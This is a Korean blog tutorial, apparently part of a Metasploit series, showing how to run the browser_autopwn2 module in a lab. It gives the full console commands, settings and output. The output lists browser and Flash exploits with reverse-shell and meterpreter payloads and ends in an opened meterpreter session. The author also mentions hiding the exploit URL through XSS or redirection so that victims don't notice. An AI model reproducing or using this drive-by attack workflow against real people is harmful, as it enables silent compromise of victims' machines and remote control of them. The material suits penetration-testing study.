[MAD-METASPLOIT] 0x21 - Browser attack

Autopwn을 이용한 Browser attack

autopwn은 웹/모바일 브라우저를 대상으로 여러 Exploit 을 체크하고 실행해주는 모듈입니다.

HAHWUL exploit(handler) > search autopwn

Matching Modules

Name Disclosure Date Rank Description —- ————— —- ———– auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter auxiliary/server/browser_autopwn2 2015-07-05 normal HTTP Client Automatic Exploiter 2 (Browser Autopwn)

그냥 autopwn과 autopwn2는 뭐 크게 차이는 없지만.. 그래도 최신이 좋을겁니다.

HAHWUL exploit(handler) > use auxiliary/server/browser_autopwn2 HAHWUL auxiliary(browser_autopwn2) > show options

Module options (auxiliary/server/browser_autopwn2):

Name Current Setting Required Description —- ————— ——– ———– EXCLUDE_PATTERN no Pattern search to exclude specific modules INCLUDE_PATTERN no Pattern search to include specific modules Retries true no Allow the browser to retry the module SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random)

Auxiliary action:

Name Description —- ———– WebServer Start a bunch of modules and direct clients to appropriate exploits

URIPATH는 경로 위치이구요, 미 지정시 랜덤하게 생성됩니다.

HAHWUL auxiliary(browser_autopwn2) > set URIPATH / URIPATH => / HAHWUL auxiliary(browser_autopwn2) > set SRVPORT 4242 SRVPORT => 4242 HAHWUL auxiliary(browser_autopwn2) > set SRVHOST 192.168.56.101 SRVHOST => 192.168.56.101 HAHWUL auxiliary(browser_autopwn2) > exploit

HAHWUL auxiliary(browser_autopwn2) > [] Starting exploit modules… [] Starting listeners… [] Time spent: 21.340055737 [-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). [] Using URL: http:// 192.168.56.101:4242/

[] The following is a list of exploits that BrowserAutoPwn will consider using. [] Exploits with the highest ranking and newest will be tried first.

Exploits

Order Rank Name Payload —– —- —- ——- 1 Excellent firefox_webidl_injection firefox/shell_reverse_tcp on 4442 2 Excellent firefox_tostring_console_injection firefox/shell_reverse_tcp on 4442 3 Excellent firefox_svg_plugin firefox/shell_reverse_tcp on 4442 4 Excellent firefox_proto_crmfrequest firefox/shell_reverse_tcp on 4442 5 Excellent webview_addjavascriptinterface android/meterpreter/reverse_tcp on 4443 6 Excellent samsung_knox_smdm_url android/meterpreter/reverse_tcp on 4443 7 Great adobe_flash_worker_byte_array_uaf windows/meterpreter/reverse_tcp on 4444 8 Great adobe_flash_domain_memory_uaf windows/meterpreter/reverse_tcp on 4444 9 Great adobe_flash_copy_pixels_to_byte_array windows/meterpreter/reverse_tcp on 4444 10 Great adobe_flash_casi32_int_overflow windows/meterpreter/reverse_tcp on 4444 11 Great adobe_flash_uncompress_zlib_uaf windows/meterpreter/reverse_tcp on 4444 12 Great adobe_flash_shader_job_overflow windows/meterpreter/reverse_tcp on 4444 13 Great adobe_flash_shader_drawing_fill windows/meterpreter/reverse_tcp on 4444 14 Great adobe_flash_pixel_bender_bof windows/meterpreter/reverse_tcp on 4444 15 Great adobe_flash_opaque_background_uaf windows/meterpreter/reverse_tcp on 4444 16 Great adobe_flash_net_connection_confusion windows/meterpreter/reverse_tcp on 4444 17 Great adobe_flash_nellymoser_bof windows/meterpreter/reverse_tcp on 4444 18 Great adobe_flash_hacking_team_uaf windows/meterpreter/reverse_tcp on 4444 19 Good wellintech_kingscada_kxclientdownload windows/meterpreter/reverse_tcp on 4444 20 Good ms14_064_ole_code_execution windows/meterpreter/reverse_tcp on 4444 21 Good adobe_flash_uncompress_zlib_uninitialized windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack: [+] BrowserAutoPwn URL: http:// 192.168.56.101:4242/ [*] Server started.

다른 일반 사용자가 웹 브라우저를 통해 http:// 192.168.56.101:4242 주소 접근 시 각 Browser에 맞는 Exploit 코드를 로드하여 사용자를 감염시킵니다. 물론 이 과정은 눈에 띄기 때문에 실제론 XSS나 URL Redirection 등을 이용해서 사용자가 인지하기 어려운 순간에 감염시키게 되죠.

HAHWUL auxiliary(browser_autopwn2) > [] Gathering target information for 192.168.56.101 [] Sending HTML response to 192.168.56.101 [] 192.168.56.101 wellintech_kingscada_kxclientdownload - Requested: /HVzrMiilwJj/eNwxdK/ [] 192.168.56.101 wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution …snip…

HAHWUL auxiliary(browser_autopwn2) > sessions -l

Active sessions

Id Type Information Connection – —- ———– ———- 1 meterpreter x86/windows HAHWUL\Test-Virtualbox @ HAHWUL 192.168.56.101:4242 -> 192.168.56.101:38258 (192.168.56.101)